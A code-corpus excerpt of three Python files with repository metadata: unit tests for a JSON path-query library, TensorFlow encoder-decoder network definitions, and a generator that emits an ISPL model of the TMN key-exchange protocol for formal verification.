        self.assertEqual(val, ["five", "four"])

    def test_111_append_value_list(self, ):
        """Append an element to a list value."""
        self.ejson_obj.append_value("object.value", "append_test")
        val = self.ejson_obj.get_value("object.value")
        self.assertIn("append_test", val)

    def test_112_append_value_dict(self, ):
        """Merge a new key/value pair into a dict value."""
        self.ejson_obj.append_value("object", {"test_name": "append_test"})
        val = self.ejson_obj.get_value("object.test_name")
        self.assertEqual(val, "append_test")

    def test_113_remove_list_data_value(self, ):
        """Remove one list element by index (after test_111 the list had 4)."""
        self.ejson_obj.remove_value("object.value.0")
        val = self.ejson_obj.get_value("object.value")
        self.assertEqual(len(val), 3)

    def test_114_remove_list_value(self, ):
        """Remove the whole list; subsequent reads return None."""
        self.ejson_obj.remove_value("object.value")
        val = self.ejson_obj.get_value("object.value")
        self.assertIsNone(val)
class TestEjson2(unittest.TestCase):
    """ejson unit tests, case 2: a document whose root is a JSON list."""

    @classmethod
    def setUpClass(cls):
        with open("json_test_2.json") as f:
            json_doc = json.load(f)
        cls.ejson_obj = EasyQueryjson(json_doc)

    def test_101_get_first_tier(self, ):
        """Paths on a list-rooted document start with the element index."""
        val = self.ejson_obj.get_value("1.id")
        self.assertEqual(val, 123456)

    def test_102_get_second_tier(self, ):
        """Nested read through root element 0."""
        val = self.ejson_obj.get_value("0.object.name")
        self.assertEqual(val, "myLittleObject")

    def test_103_get_third_tier(self, ):
        """List index inside a nested object."""
        val = self.ejson_obj.get_value("1.object.valueAsString.0")
        self.assertEqual(val, "one")

    def test_104_get_third_tier_list0_dict_value(self, ):
        """Dict key inside a list element of a nested object."""
        val = self.ejson_obj.get_value("1.object.value.1.key")
        self.assertEqual(val, "value2")

    def test_105_get_list_all_key_value(self, ):
        """Collect a key from every element of a nested list."""
        val = self.ejson_obj.get_value("0.object.value.key")
        self.assertEqual(val, ["value1", "value2", "value3"])

    def test_106_change_first_tier(self, ):
        """Overwrite a value addressed through the root index."""
        self.ejson_obj.change_value("0.id", "123456")
        val = self.ejson_obj.get_value("0.id")
        self.assertEqual(val, 123456)

    def test_107_change_second_tier(self, ):
        """Overwrite a nested value."""
        self.ejson_obj.change_value("0.object.name", "updatename")
        val = self.ejson_obj.get_value("0.object.name")
        self.assertEqual(val, "updatename")

    # NOTE(review): numbering duplicates test_107 above; should probably be
    # test_108. Both tests still run because the full method names differ.
    def test_107_change_list_value(self, ):
        """Replace a list element with a new list."""
        self.ejson_obj.change_value("1.object.value.2", ["five", "four"])
        val = self.ejson_obj.get_value("1.object.value.2")
        self.assertEqual(val, ["five", "four"])
class TestEjson3(unittest.TestCase):
    """ejson unit tests, case 3: [key=value] attribute selectors.

    (The original docstring said 'second case'; this class actually exercises
    the bracketed attribute-query syntax.)
    """

    @classmethod
    def setUpClass(cls):
        with open("json_test_3.json") as f:
            json_doc = json.load(f)
        cls.ejson_obj = EasyQueryjson(json_doc)

    def test_101_get_first_tier(self, ):
        """[key=value] selects the matching element (a dict) from the root list."""
        val = self.ejson_obj.get_value("[id=123456]")
        self.assertEqual(val["id"], 123456)

    def test_102_get_second_tier(self, ):
        """A dotted path may continue after an attribute selector."""
        val = self.ejson_obj.get_value("[id=123456].object.value")
        self.assertEqual(len(val), 3)

    def test_103_get_third_tier(self, ):
        """Attribute selectors may appear at any depth."""
        val = self.ejson_obj.get_value("[id=123456].object.value[key1=value1]")
        self.assertEqual(len(val), 3)

    def test_104_get_third_tier_list0_dict_value(self, ):
        """Read a sibling key from the element matched by the selector."""
        val = self.ejson_obj.get_value("[id=123456].object.value[key1=value1].key3")
        self.assertEqual(val, "value3")

    def test_105_get_list_all_key_value(self, ):
        """Numeric root index combined with an attribute selector."""
        val = self.ejson_obj.get_value("1.object.value[key11=value11].key33")
        self.assertEqual(val, "value33")

    def test_106_get_value_by_mul_attr(self, ):
        """Multiple comma-separated attributes must all match."""
        val = self.ejson_obj.get_value("1.object.value[key11=value11,key22=value22, key33=value33].key33")
        self.assertEqual(val, "value33")

    def test_107_get_list_by_mul_attr(self, ):
        """Multi-attribute selector returning the whole matched element."""
        val = self.ejson_obj.get_value("1.object.value[key11=value11,key22=value22, key33=value33]")
        self.assertEqual(len(val), 3)

    def test_108_not_found_by_mul_attr(self, ):
        """If any attribute fails to match, the query yields None."""
        val = self.ejson_obj.get_value("1.object.value[key11=value11,key22=value2, key33=value33]")
        self.assertIs(val, None)
if __name__ == '__main__':
    # Run the three suites in a fixed order with verbose output.
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    for case in (TestEjson1, TestEjson2, TestEjson3):
        suite.addTests(loader.loadTestsFromTestCase(case))
    unittest.TextTestRunner(verbosity=2).run(suite)
| 22.023936 | 106 | 0.55102 | 938 | 8,281 | 4.605544 | 0.130064 | 0.075926 | 0.105556 | 0.123148 | 0.843287 | 0.824074 | 0.824074 | 0.790278 | 0.74838 | 0.688194 | 0 | 0.04878 | 0.316749 | 8,281 | 375 | 107 | 22.082667 | 0.71474 | 0.10675 | 0 | 0.504132 | 0 | 0 | 0.159671 | 0.050371 | 0 | 0 | 0 | 0 | 0.231405 | 1 | 0.256198 | false | 0 | 0.024793 | 0 | 0.305785 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1f0c891578f5336bb64cf75328f73cda04ce726d | 8,894 | py | Python | core/models.py | CVLAB-Unibo/ATDT | 3ef50ae7682d7362525ec3eab845af3aa2a57fe7 | [
"MIT"
] | 16 | 2019-09-11T16:14:32.000Z | 2021-01-05T17:49:37.000Z | core/models.py | CVLAB-Unibo/ATDT | 3ef50ae7682d7362525ec3eab845af3aa2a57fe7 | [
"MIT"
] | 4 | 2020-01-28T22:16:59.000Z | 2021-08-25T14:49:39.000Z | core/models.py | CVLAB-Unibo/ATDT | 3ef50ae7682d7362525ec3eab845af3aa2a57fe7 | [
"MIT"
] | 1 | 2021-03-16T13:32:07.000Z | 2021-03-16T13:32:07.000Z | import numpy as np
import tensorflow as tf
from collections import namedtuple
from core.ops import *
from utils.utils import *
def build_vgg(inputs, use_skips = False, reuse_variables=False, normalizer_fn=None):
    """VGG-style encoder: seven stride-2 conv blocks (H/2 ... H/128).

    Returns (convs, skips): convs holds every intermediate feature map;
    skips is all but the last of them when use_skips is set, else [].
    """
    with tf.variable_scope('encoder', reuse=reuse_variables):
        # (filters, kernel) per downsampling stage.
        stage_specs = ((32, 7), (64, 5), (128, 3), (256, 3), (512, 3), (512, 3), (512, 3))
        convs = []
        net = inputs
        for filters, ksize in stage_specs:
            net = conv_block(net, filters, ksize, normalizer_fn=normalizer_fn)
            convs.append(net)
        skips = []
        if use_skips:
            print("Adding Skip Connections")
            skips = convs[:-1]
        return convs, skips
def build_resnet50(inputs, use_skips = False, reuse_variables=False, normalizer_fn=None):
    """ResNet50 encoder: stem conv + maxpool, then four residual stages (H/2 ... H/64).

    Returns (features, skips): skips is all but the last feature map when
    use_skips is set, else [].
    """
    with tf.variable_scope('encoder', reuse=reuse_variables):
        net = conv(inputs, 64, 7, 2, normalizer_fn=normalizer_fn)  # H/2 - 64D
        feats = [net]
        net = maxpool(net, 3)  # H/4 - 64D
        feats.append(net)
        # (filters, num_blocks) per residual stage; output depths 256..2048.
        for filters, num_blocks in ((64, 3), (128, 4), (256, 6), (512, 3)):
            net = resblock(net, filters, num_blocks, normalizer_fn=normalizer_fn)
            feats.append(net)
        skips = []
        if use_skips:
            print("Adding Skip Connections")
            skips = feats[:-1]
        return feats, skips
def build_dilated_resnet50(inputs, use_skips = False, reuse_variables=False, normalizer_fn=None):
    """Dilated ResNet50 encoder: resolution stops shrinking at H/16.

    The last two stages use dilation rates 2 and 4 instead of striding.
    Returns (features, skips): the stem conv is excluded from features, and
    skips (when use_skips is set) excludes the two dilated stages.
    """
    with tf.variable_scope('encoder', reuse=reuse_variables):
        maps = []
        maps.append(conv(inputs, 64, 7, 2, normalizer_fn=normalizer_fn))                 # H/2  - 64D
        maps.append(maxpool(maps[-1], 3))                                                # H/4  - 64D
        maps.append(resblock(maps[-1], 64, 3, normalizer_fn=normalizer_fn))              # H/8  - 256D
        maps.append(resblock(maps[-1], 128, 4, normalizer_fn=normalizer_fn))             # H/16 - 512D
        maps.append(resblock_dilated(maps[-1], 256, 6, 2, normalizer_fn=normalizer_fn))  # H/16 - 1024D - rate 2
        maps.append(resblock_dilated(maps[-1], 512, 3, 4, normalizer_fn=normalizer_fn))  # H/16 - 2048D - rate 4
        skips = []
        if use_skips:
            print("Adding Skip Connections")
            skips = maps[1:-2]
        return maps[1:], skips
def build_decoder_vgg(inputs, out_channels, skips= [], reuse_variables=False, normalizer_fn=None):
    """Decoder for the VGG encoder: seven 2x upsampling stages back to input size.

    inputs: bottleneck feature map (H/128); skips, if given, hold the encoder
    activations (index 0 = H/2 ... 5 = H/64) concatenated after each stage.
    The last conv has no activation, so the caller picks the output nonlinearity.
    """
    print("Adding Skip Connections") if skips else None
    with tf.variable_scope('decoder', reuse=reuse_variables):
        upconv7 = upconv(inputs, 512, 3, 2, normalizer_fn=normalizer_fn)  # H/64
        if skips:
            upconv7 = tf.concat([upconv7, skips[5]], 3)
        iconv7 = conv(upconv7, 512, 3, 1, normalizer_fn=normalizer_fn)
        upconv6 = upconv(iconv7, 512, 3, 2, normalizer_fn=normalizer_fn)  # H/32
        if skips:
            upconv6 = tf.concat([upconv6, skips[4]], 3)
        iconv6 = conv(upconv6, 512, 3, normalizer_fn=normalizer_fn)
        upconv5 = upconv(iconv6, 256, 3, 2, normalizer_fn=normalizer_fn)  # H/16
        if skips:
            upconv5 = tf.concat([upconv5, skips[3]], 3)
        iconv5 = conv(upconv5, 256, 3, 1, normalizer_fn=normalizer_fn)
        upconv4 = upconv(iconv5, 128, 3, 2, normalizer_fn=normalizer_fn)  # H/8
        if skips:
            upconv4 = tf.concat([upconv4, skips[2]], 3)
        iconv4 = conv(upconv4, 128, 3, 1, normalizer_fn=normalizer_fn)
        # BUG FIX: this stage previously upsampled `inputs` (the bottleneck)
        # instead of iconv4, silently discarding the whole H/64..H/8 decoder
        # path (iconv4 was computed and never used). Feed iconv4 forward, as
        # the ResNet decoders do.
        upconv3 = upconv(iconv4, 64, 3, 2, normalizer_fn=normalizer_fn)  # H/4
        if skips:
            upconv3 = tf.concat([upconv3, skips[1]], 3)
        iconv3 = conv(upconv3, 64, 3, 1, normalizer_fn=normalizer_fn)
        upconv2 = upconv(iconv3, 32, 3, 2, normalizer_fn=normalizer_fn)  # H/2
        if skips:
            upconv2 = tf.concat([upconv2, skips[0]], 3)
        iconv2 = conv(upconv2, 32, 3, 1, normalizer_fn=normalizer_fn)
        upconv1 = upconv(iconv2, out_channels, 3, 2, normalizer_fn=None)  # H
        iconv1 = conv(upconv1, out_channels, 3, 1, activation_fn=None)
        return iconv1
def build_decoder_resnet(inputs, out_channels, skips= [], reuse_variables=False, normalizer_fn=None):
    """Decoder for the ResNet50 encoder: five 2x upsampling stages.

    inputs: bottleneck feature map (H/64); skips, if given, hold the encoder
    activations (index 0 = H/2 ... 4 = H/32) concatenated after each stage.
    The last conv has no activation, so the caller picks the output nonlinearity.
    """
    print("Adding Skip Connections") if skips else None
    with tf.variable_scope('decoder', reuse=reuse_variables):
        upconv6 = upconv(inputs, 512, 3, 2, normalizer_fn=normalizer_fn)  # H/32
        if skips:
            upconv6 = tf.concat([upconv6, skips[4]], 3)
        iconv6 = conv(upconv6, 512, 3, 1, normalizer_fn=normalizer_fn)
        upconv5 = upconv(iconv6, 256, 3, 2, normalizer_fn=normalizer_fn)  # H/16
        if skips:
            upconv5 = tf.concat([upconv5, skips[3]], 3)
        iconv5 = conv(upconv5, 256, 3, 1, normalizer_fn=normalizer_fn)
        upconv4 = upconv(iconv5, 128, 3, 2, normalizer_fn=normalizer_fn)  # H/8
        if skips:
            upconv4 = tf.concat([upconv4, skips[2]], 3)
        iconv4 = conv(upconv4, 128, 3, 1, normalizer_fn=normalizer_fn)
        upconv3 = upconv(iconv4, 64, 3, 2, normalizer_fn=normalizer_fn)  # H/4
        if skips:
            upconv3 = tf.concat([upconv3, skips[1]], 3)
        iconv3 = conv(upconv3, 64, 3, 1, normalizer_fn=normalizer_fn)
        # NOTE(review): the only upconv without normalizer_fn -- looks
        # inconsistent with the other stages; confirm it is intentional.
        upconv2 = upconv(iconv3, 32, 3, 2)  # H/2
        if skips:
            upconv2 = tf.concat([upconv2, skips[0]], 3)
        iconv2 = conv(upconv2, 32, 3, 1, normalizer_fn=normalizer_fn)
        upconv1 = upconv(iconv2, out_channels, 3, 2, normalizer_fn=None)  # H
        iconv1 = conv(upconv1, out_channels, 3, 1, activation_fn=None)
        return iconv1
def build_decoder_dilated_resnet(inputs, out_channels, skips= [], reuse_variables=False, normalizer_fn=None):
    """Decoder for the dilated ResNet50 encoder: three 2x upsampling stages + output stage.

    inputs: bottleneck feature map (H/16, since the dilated encoder stops
    downsampling there); skips, if given, are indexed from the end
    ([-1] = H/16 stage ... [-3] = H/4 stage) and concatenated after each
    upsampling. The last conv has no activation.
    """
    print("Adding Skip Connections") if skips else None
    with tf.variable_scope('decoder', reuse=reuse_variables):
        upconv4 = upconv(inputs, 128, 3, 2, normalizer_fn=normalizer_fn)  # H/8
        if skips:
            upconv4 = tf.concat([upconv4, skips[-1]], 3)
        iconv4 = conv(upconv4, 128, 3, 1, normalizer_fn=normalizer_fn)
        upconv3 = upconv(iconv4, 64, 3, 2, normalizer_fn=normalizer_fn)  # H/4
        if skips:
            upconv3 = tf.concat([upconv3, skips[-2]], 3)
        iconv3 = conv(upconv3, 64, 3, 1, normalizer_fn=normalizer_fn)
        # NOTE(review): the only upconv without normalizer_fn -- looks
        # inconsistent with the other stages; confirm it is intentional.
        upconv2 = upconv(iconv3, 32, 3, 2)  # H/2
        if skips:
            upconv2 = tf.concat([upconv2, skips[-3]], 3)
        iconv2 = conv(upconv2, 32, 3, 1, normalizer_fn=normalizer_fn)
        upconv1 = upconv(iconv2, out_channels, 3, 2, normalizer_fn=None)  # H
        iconv1 = conv(upconv1, out_channels, 3, 1, activation_fn=None)
        return iconv1
def build_model(inputs, out_channels, use_skips=False, encoder='dilated-resnet', name='model', reuse_variables=False, normalizer_fn=None):
    """Build an encoder/decoder pair for the requested architecture.

    Returns (output, features): the decoder's full-resolution prediction and
    the encoder's intermediate feature maps.
    Raises NotImplementedError for an unknown encoder name.
    """
    # Dispatch table: encoder name -> (banner, encoder builder, decoder builder).
    architectures = {
        'vgg': ("Building VGG", build_vgg, build_decoder_vgg),
        'resnet': ("Building ResNet50", build_resnet50, build_decoder_resnet),
        'dilated-resnet': ("Building Dilated-ResNet50", build_dilated_resnet50, build_decoder_dilated_resnet),
    }
    with tf.variable_scope(name, reuse=reuse_variables):
        if encoder not in architectures:
            raise NotImplementedError("Architecture not implemented")
        banner, encode, decode = architectures[encoder]
        print(banner)
        features, skips = encode(inputs, use_skips=use_skips, normalizer_fn=normalizer_fn)
        output = decode(features[-1], out_channels, skips, normalizer_fn=normalizer_fn)
        return output, features
def transfer_network(features_source, normalizer_fn=None):
    """Adapt source-domain features with a small hourglass of convolutions.

    Two stride-2 convs compress the input, two upconvs restore its spatial
    size, and a final conv maps back to the input channel count.
    NOTE(review): normalizer_fn is accepted but not applied to any layer here.
    """
    squeezed = conv(conv(features_source, 2048, 3, 2), 2048, 3, 2)
    restored = conv(upconv(squeezed, 2048, 3, 2), 2048, 3, 1)
    restored = upconv(restored, 2048, 3, 2)
    return conv(restored, features_source.get_shape()[-1], 3, 1)
1f7d811ee13b36fdbaa2ca5cf27c0c16c0bc6785 | 59,753 | py | Python | stv/generators/ispl/tmn.py | wp777/stv-compute | 313b574c43ef87b629e70c25c38dbb7b24d1f130 | [
"MIT"
] | 2 | 2021-07-11T09:52:59.000Z | 2022-02-13T17:34:59.000Z | stv/generators/ispl/tmn.py | wp777/stv-compute | 313b574c43ef87b629e70c25c38dbb7b24d1f130 | [
"MIT"
] | 3 | 2020-07-26T13:49:59.000Z | 2021-01-19T18:04:10.000Z | stv/generators/ispl/tmn.py | wp777/stv-compute | 313b574c43ef87b629e70c25c38dbb7b24d1f130 | [
"MIT"
] | null | null | null | from stv.tools.string_tools import StringTools
class TmnProtocolIsplGenerator:
# TODO: integrate with IsplGenerator class
ispl_model = ""  # class-level default; create_ispl_model() accumulates generated text here
agents = ["alice", "bob", "server", "attacker"]  # all parties of the TMN protocol model
no_messages = 3  # number of messages tracked per protocol run
def __init__(self):
    """No per-instance setup; class-level defaults are used as-is."""
    pass
def create_ispl_model(self):
    """Generate and return the complete ISPL model text.

    Resets self.ispl_model first: ispl_model is a class-level default, so
    without the reset a second call would append a duplicate copy of every
    section to the text produced by the first call.
    """
    self.ispl_model = ""
    self.ispl_model += self.__define_semantics()
    self.ispl_model += self.__create_environment()
    self.ispl_model += self.__create_alice()
    self.ispl_model += self.__create_bob()
    self.ispl_model += self.__create_server()
    self.ispl_model += self.__create_attacker()
    self.ispl_model += self.__create_evaluation()
    self.ispl_model += self.__create_init_states()
    self.ispl_model += self.__create_groups()
    self.ispl_model += self.__create_formulae()
    return self.ispl_model
def __define_semantics(self):
    """Return the ISPL semantics header (single-assignment semantics)."""
    return "Semantics=SingleAssignment;\n\n"
def __create_environment(self):
    """Assemble the full Environment agent declaration."""
    sections = (
        "Agent Environment\n",
        self.__create_environment_obsvars(),
        self.__create_environment_vars(),
        self.__create_environment_actions(),
        self.__create_environment_protocol(),
        self.__create_environment_evolution(),
        "end Agent\n\n",
    )
    return "".join(sections)
def __create_environment_obsvars(self):
    """Observable environment state: each message's key and content, plus the protocol flag.

    message{i}Key / message{i}Content range over the agents' key constants
    ({agent}KeyM); 'protocol' is a boolean the agents' protocols consult.
    """
    obsvars = "\tObsvars:\n"
    # Which agent's key each message is encrypted under.
    for message_no in range(1, self.no_messages + 1):
        obsvars += f"\t\tmessage{message_no}Key : " + "{"
        for agent_name in self.agents:
            obsvars += f"{agent_name}KeyM, "
        # Drop the trailing ", " before closing the enumeration.
        obsvars = obsvars.rstrip(" ,")
        obsvars += "};\n"
    # Which agent's key constant each message carries as payload.
    for message_no in range(1, self.no_messages + 1):
        obsvars += f"\t\tmessage{message_no}Content : " + "{"
        for agent_name in self.agents:
            obsvars += f"{agent_name}KeyM, "
        obsvars = obsvars.rstrip(" ,")
        obsvars += "};\n"
    obsvars += "\t\tprotocol : boolean;\n"
    obsvars += "\tend Obsvars\n"
    return obsvars
def __create_environment_vars(self):
    """Return the (empty) private Vars section of the Environment agent."""
    return "\tVars:\n" + "\tend Vars\n"
def __create_environment_actions(self):
    """The Environment has a single 'none' action."""
    return "\tActions = {none};\n"
def __create_environment_protocol(self):
    """The Environment always selects its 'none' action."""
    return "\tProtocol:\n\t\tOther: {none};\n\tend Protocol\n"
def __create_environment_evolution(self):
    """Return an empty Evolution section (no Environment-driven transitions here)."""
    return "\tEvolution:\n" + "\tend Evolution\n"
def __create_alice(self):
    """Assemble the full Alice agent declaration."""
    sections = (
        "Agent Alice\n",
        self.__create_alice_vars(),
        self.__create_alice_actions(),
        self.__create_alice_protocol(),
        self.__create_alice_evolution(),
        "end Agent\n\n",
    )
    return "".join(sections)
def __create_alice_lobsvars(self):
    """Empty Lobsvars declaration.

    NOTE(review): not referenced by __create_alice in this excerpt; it may be
    used elsewhere in the class -- confirm before removing.
    """
    return "\tLobsvars = {};\n"
def __create_alice_vars(self):
    """Alice's private state: one boolean per known key, one status per message."""
    lines = ["\tVars:\n"]
    lines += [f"\t\t{name}Key : boolean;\n" for name in self.agents]
    lines += [f"\t\tmessage{no} : " + "{none, plain, encrypted};\n"
              for no in range(1, self.no_messages + 1)]
    lines.append("\tend Vars\n")
    return "".join(lines)
def __create_alice_actions(self):
    """Alice's action set: per message, decrypt it or forward it to any other agent; plus Wait."""
    actions = "\tActions = {"
    for message_no in range(1, self.no_messages + 1):
        actions += f"decryptMessage{message_no}, "
        for agent_name in self.agents:
            if agent_name == 'alice':
                # Alice never sends a message to herself.
                continue
            agent_name = StringTools.capitalize_first_letter(agent_name)
            actions += f"sendMessage{message_no}To{agent_name}, "
    actions += "Wait};\n"
    return actions
def __create_alice_protocol(self):
    """Alice's protocol: which actions are enabled in which states.

    - A message may be decrypted once Alice holds the matching key.
    - Outside the protocol run, a plaintext message can be forwarded to any
      other agent (or Alice may wait).
    - During the protocol run, Alice's only move is sending message 1 to the server.
    """
    protocol = "\tProtocol:\n"
    for message_no in range(1, self.no_messages + 1):
        for agent_name in self.agents:
            protocol += f"\t\t(message{message_no}=encrypted and {agent_name}Key=true and Environment.message{message_no}Key={agent_name}KeyM) or\n"
        # Strip the trailing " or\n" left by the loop above; rstrip works on a
        # character set, safe only because the text always ends in " or\n".
        protocol = protocol.rstrip("\nro ")
        protocol += ": {" + f"decryptMessage{message_no}" + "};\n"
    for message_no in range(1, self.no_messages + 1):
        protocol += f"\t\t(message{message_no}=plain and Environment.protocol=false): " + "{"
        for agent_name in self.agents:
            if agent_name == 'alice':
                continue
            agent_name = StringTools.capitalize_first_letter(agent_name)
            protocol += f"sendMessage{message_no}To{agent_name}, "
        protocol += "Wait};\n"
    protocol += "\t\t(message1=plain and Environment.protocol=true): {sendMessage1ToServer};\n"
    protocol += "\t\tOther: {Wait};\n"
    protocol += "\tend Protocol\n"
    return protocol
def __create_alice_evolution(self):
    """Alice's state transitions.

    - A key becomes held after decrypting a message whose content is that key.
    - A message becomes plain when Alice decrypts it.
    - A message becomes encrypted when some other agent sends it to Alice.
    """
    evolution = "\tEvolution:\n"
    for agent_name in self.agents:
        evolution += f"\t\t{agent_name}Key=true if\n"
        for message_no in range(1, self.no_messages + 1):
            evolution += f"\t\t\t(Action=decryptMessage{message_no} and Environment.message{message_no}Content={agent_name}KeyM) or\n"
        # Strip the trailing " or\n" left by the inner loop (char-set rstrip).
        evolution = evolution.rstrip("\nro ")
        evolution += ";\n"
    for message_no in range(1, self.no_messages + 1):
        evolution += f"\t\tmessage{message_no}=plain if Action=decryptMessage{message_no};\n"
    for message_no in range(1, self.no_messages + 1):
        evolution += f"\t\tmessage{message_no}=encrypted if\n"
        evolution += f"\t\t\tmessage{message_no}=none and (\n"
        for agent_name in self.agents:
            if agent_name == "alice":
                continue
            agent_name = StringTools.capitalize_first_letter(agent_name)
            evolution += f"\t\t\t{agent_name}.Action=sendMessage{message_no}ToAlice or\n"
        evolution = evolution.rstrip("\nro ")
        evolution += ");\n"
    evolution += "\tend Evolution\n"
    return evolution
def __create_bob(self):
    """Assemble the full Bob agent declaration."""
    sections = (
        "Agent Bob\n",
        self.__create_bob_vars(),
        self.__create_bob_actions(),
        self.__create_bob_protocol(),
        self.__create_bob_evolution(),
        "end Agent\n\n",
    )
    return "".join(sections)
def __create_bob_lobsvars(self):
    """Empty Lobsvars declaration (mirrors Alice's; not referenced in this excerpt)."""
    return "\tLobsvars = {};\n"
def __create_bob_vars(self):
    """Bob's private state: one boolean per known key, one status per message."""
    lines = ["\tVars:\n"]
    lines += [f"\t\t{name}Key : boolean;\n" for name in self.agents]
    lines += [f"\t\tmessage{no} : " + "{none, plain, encrypted};\n"
              for no in range(1, self.no_messages + 1)]
    lines.append("\tend Vars\n")
    return "".join(lines)
def __create_bob_actions(self):
    """Bob's action set: per message, decrypt it or forward it to any other agent; plus Wait."""
    actions = "\tActions = {"
    for message_no in range(1, self.no_messages + 1):
        actions += f"decryptMessage{message_no}, "
        for agent_name in self.agents:
            if agent_name == 'bob':
                # Bob never sends a message to himself.
                continue
            agent_name = StringTools.capitalize_first_letter(agent_name)
            actions += f"sendMessage{message_no}To{agent_name}, "
    actions += "Wait};\n"
    return actions
def __create_bob_protocol(self):
    """Bob's protocol (mirror of Alice's, except message 2 goes to the server during the run)."""
    protocol = "\tProtocol:\n"
    for message_no in range(1, self.no_messages + 1):
        for agent_name in self.agents:
            protocol += f"\t\t(message{message_no}=encrypted and {agent_name}Key=true and Environment.message{message_no}Key={agent_name}KeyM) or\n"
        # Strip the trailing " or\n" left by the loop above (char-set rstrip).
        protocol = protocol.rstrip("\nro ")
        protocol += ": {" + f"decryptMessage{message_no}" + "};\n"
    for message_no in range(1, self.no_messages + 1):
        protocol += f"\t\t(message{message_no}=plain and Environment.protocol=false): " + "{"
        for agent_name in self.agents:
            if agent_name == 'bob':
                continue
            agent_name = StringTools.capitalize_first_letter(agent_name)
            protocol += f"sendMessage{message_no}To{agent_name}, "
        protocol += "Wait};\n"
    protocol += "\t\t(message2=plain and Environment.protocol=true): {sendMessage2ToServer};\n"
    protocol += "\t\tOther: {Wait};\n"
    protocol += "\tend Protocol\n"
    return protocol
def __create_bob_evolution(self):
    """Emit Bob's Evolution section.

    Keys become known when a message carrying them is decrypted; a message
    turns plain when decrypted and encrypted when some other agent sends it
    to Bob.
    """
    evolution = "\tEvolution:\n"
    for agent_name in self.agents:
        evolution += f"\t\t{agent_name}Key=true if\n"
        for message_no in range(1, self.no_messages + 1):
            evolution += f"\t\t\t(Action=decryptMessage{message_no} and Environment.message{message_no}Content={agent_name}KeyM) or\n"
        # Trim the dangling " or\n" before terminating the rule.
        evolution = evolution.rstrip("\nro ")
        evolution += ";\n"
    for message_no in range(1, self.no_messages + 1):
        evolution += f"\t\tmessage{message_no}=plain if Action=decryptMessage{message_no};\n"
    for message_no in range(1, self.no_messages + 1):
        evolution += f"\t\tmessage{message_no}=encrypted if\n"
        evolution += f"\t\t\tmessage{message_no}=none and (\n"
        for agent_name in self.agents:
            if agent_name == "bob":
                continue  # Bob cannot deliver a message to himself.
            agent_name = StringTools.capitalize_first_letter(agent_name)
            evolution += f"\t\t\t{agent_name}.Action=sendMessage{message_no}ToBob or\n"
        evolution = evolution.rstrip("\nro ")
        evolution += ");\n"
    evolution += "\tend Evolution\n"
    return evolution
def __create_server(self):
    """Assemble the complete ISPL 'Agent Server' section from its sub-sections."""
    return "".join((
        "Agent Server\n",
        self.__create_server_vars(),
        self.__create_server_actions(),
        self.__create_server_protocol(),
        self.__create_server_evolution(),
        "end Agent\n\n",
    ))
def __create_server_lobsvars(self):
    """Emit the Server's (currently empty) Lobsvars declaration."""
    return "\tLobsvars = {};\n"
def __create_server_vars(self):
    """Emit the Server's Vars section: key flags for every agent and a state per message."""
    lines = ["\tVars:\n"]
    for owner in self.agents:
        lines.append(f"\t\t{owner}Key : boolean;\n")
    for no in range(1, self.no_messages + 1):
        lines.append(f"\t\tmessage{no} : " + "{none, plain, encrypted};\n")
    lines.append("\tend Vars\n")
    return "".join(lines)
def __create_server_actions(self):
    """Emit the Server's action set: decrypt each message or forward it to any other agent."""
    out = "\tActions = {"
    for no in range(1, self.no_messages + 1):
        out += f"decryptMessage{no}, "
        out += "".join(
            f"sendMessage{no}To{StringTools.capitalize_first_letter(peer)}, "
            for peer in self.agents
            if peer != 'server'
        )
    return out + "Wait};\n"
def __create_server_protocol(self):
    """Emit the Server's Protocol section.

    Decryption guards per message, free forwarding of plain messages outside
    the protocol, and the scripted send of message 3 to Alice when following
    the protocol.
    """
    protocol = "\tProtocol:\n"
    for message_no in range(1, self.no_messages + 1):
        for agent_name in self.agents:
            protocol += f"\t\t(message{message_no}=encrypted and {agent_name}Key=true and Environment.message{message_no}Key={agent_name}KeyM) or\n"
        # Trim the trailing " or\n" before closing the guard.
        protocol = protocol.rstrip("\nro ")
        protocol += ": {" + f"decryptMessage{message_no}" + "};\n"
    for message_no in range(1, self.no_messages + 1):
        protocol += f"\t\t(message{message_no}=plain and Environment.protocol=false): " + "{"
        for agent_name in self.agents:
            if agent_name == 'server':
                continue  # the Server never sends to itself.
            agent_name = StringTools.capitalize_first_letter(agent_name)
            protocol += f"sendMessage{message_no}To{agent_name}, "
        protocol += "Wait};\n"
    # Scripted behaviour: the Server's only protocol send is message 3 to Alice.
    protocol += "\t\t(message3=plain and Environment.protocol=true): {sendMessage3ToAlice};\n"
    protocol += "\t\tOther: {Wait};\n"
    protocol += "\tend Protocol\n"
    return protocol
def __create_server_evolution(self):
    """Emit the Server's Evolution section.

    Key learning on decryption, message state transitions on receipt and
    decryption, and an additional rule that turns a message plain directly
    when both its content and encryption keys are already known.
    """
    evolution = "\tEvolution:\n"
    for agent_name in self.agents:
        evolution += f"\t\t{agent_name}Key=true if\n"
        for message_no in range(1, self.no_messages + 1):
            evolution += f"\t\t\t(Action=decryptMessage{message_no} and Environment.message{message_no}Content={agent_name}KeyM) or\n"
        # Trim the trailing " or\n".
        evolution = evolution.rstrip("\nro ")
        evolution += ";\n"
    for message_no in range(1, self.no_messages + 1):
        evolution += f"\t\tmessage{message_no}=plain if Action=decryptMessage{message_no};\n"
    for message_no in range(1, self.no_messages + 1):
        evolution += f"\t\tmessage{message_no}=encrypted if\n"
        evolution += f"\t\t\tmessage{message_no}=none and (\n"
        for agent_name in self.agents:
            if agent_name == "server":
                continue
            agent_name = StringTools.capitalize_first_letter(agent_name)
            evolution += f"\t\t\t{agent_name}.Action=sendMessage{message_no}ToServer or\n"
        # Deliberately no space in the strip set: stripping ' ' as well would
        # also consume the final 'r' of "...ToServer"; a trailing space remains.
        evolution = evolution.rstrip("\nro")
        evolution += ");\n"
    for message_no in range(1, self.no_messages + 1):
        evolution += f"\t\tmessage{message_no}=plain if\n"
        for agent_name in self.agents:
            for key_name in self.agents:
                evolution += f"\t\t\t({agent_name}Key=true and Environment.message{message_no}Content={agent_name}KeyM and {key_name}Key=true and Environment.message{message_no}Key={key_name}KeyM) or\n"
        evolution = evolution.rstrip("\nro ")
        evolution += ";\n"
    evolution += "\tend Evolution\n"
    return evolution
